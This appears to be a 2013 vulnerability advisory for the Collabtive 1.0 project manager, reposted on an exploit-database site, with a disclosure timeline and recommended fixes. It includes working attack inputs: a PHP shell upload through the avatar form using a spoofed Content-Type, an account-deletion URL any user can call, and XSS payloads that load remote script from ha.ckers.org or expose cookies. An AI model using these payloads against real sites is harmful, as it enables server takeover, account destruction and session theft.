0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Collabtive 1.0 XSS / Shell Upload / Privilege Escalation
============================================= - Release date: July 22th, 2013 - Discovered by: Enrico Cinquini - Severity: High ============================================= I. VULNERABILITY ------------------------- Collabtive multiple vulnerabilities. II. INTRODUCTION ------------------------- The last version of Collabtive (1.0) is affected by multiple vulnerabilities. IV. DESCRIPTION ------------------------- 1) UPLOAD PHP FILE INSIDE AVATAR: In the following function: https://hostname/secprj/manageuser.php?action=edit it's possible to upload a php file inside avatar by modifying the Content-Type as following: Content-Type: image/jpeg The file will be uploaded inside the standard directory and encoded with a six-characters number at the end of the file, like the following example: https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php It's really fast to enumerate all the possibility and to execute the file uploaded. This vulnerability was identified in older releases, but it's still present. 2) ACCOUNT DELETION It's possible to delete any account from every user, by calling the following URL: https://hostname/secprj/manageuser.php?action=del&id=5 By setting the value "del" to parameter "action", the account with setted ID will be deleted, even if will apper an error message. An "User" account with no privilege can delete all kind of account, including Administrators. 3) CROSS SITE SCRITPING - CHAT: The application is vulnerable to XSS attack in the managechat.php page. The parameter affected is 'userto': https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC=" http://ha.ckers.org/xss.js"></SCRIPT>&uid=2 4) CROSS SITE SCRITPING - TIMETRACKER The page managetimetracker.php is affected by Cross Site Scripting vulnerability. The POST parameters 'start' and 'end' are vulnerable, for example, to the following XSS: "><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 5) CROSS SITE SCRITPING - Multiple vulnerabilities: The application is vulnerable to XSS attack in different pages: manageproject.php managemilestone.php managetask.php managemessage.php To exploit the vulnerability it's necessary to set a new object name (project, milestone, task, message) like the following example: "><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> the script will be executed in the same page, and in dashboard,too. 6) CROSS SITE SCRITPING - PROFILE The page manageuser.php?action=editform is affected by Cross Site Scripting vulnerability. All the profile fields are vulnerable, for example, to the following injection: <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> VI. BUSINESS IMPACT ------------------------- An attacker could upload malicious file, delete accounts and perform XSS attacks. VII. SYSTEMS AFFECTED ------------------------- Version 1.0 is vulnerable. VIII. SOLUTION ------------------------- It's necessary to: - implement a strong upload filter to prevent the upload of malicious file - implement an input validation mechanism to avoid being vulnerable to XSS injection - review and correct users profiling to prevent a user can delete other accounts IX. REFERENCES ------------------------- Collabtive website: http://collabtive.o-dyn.de X. CREDITS ------------------------- The vulnerability has been discovered by: Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com XI. VULNERABILITY HISTORY ------------------------- June 20th, 2013: Vulnerability identification June 21th, 2013: Vendor notification July 22th, 2013: Vulnerability disclosure # 0day.today [2024-12-25] #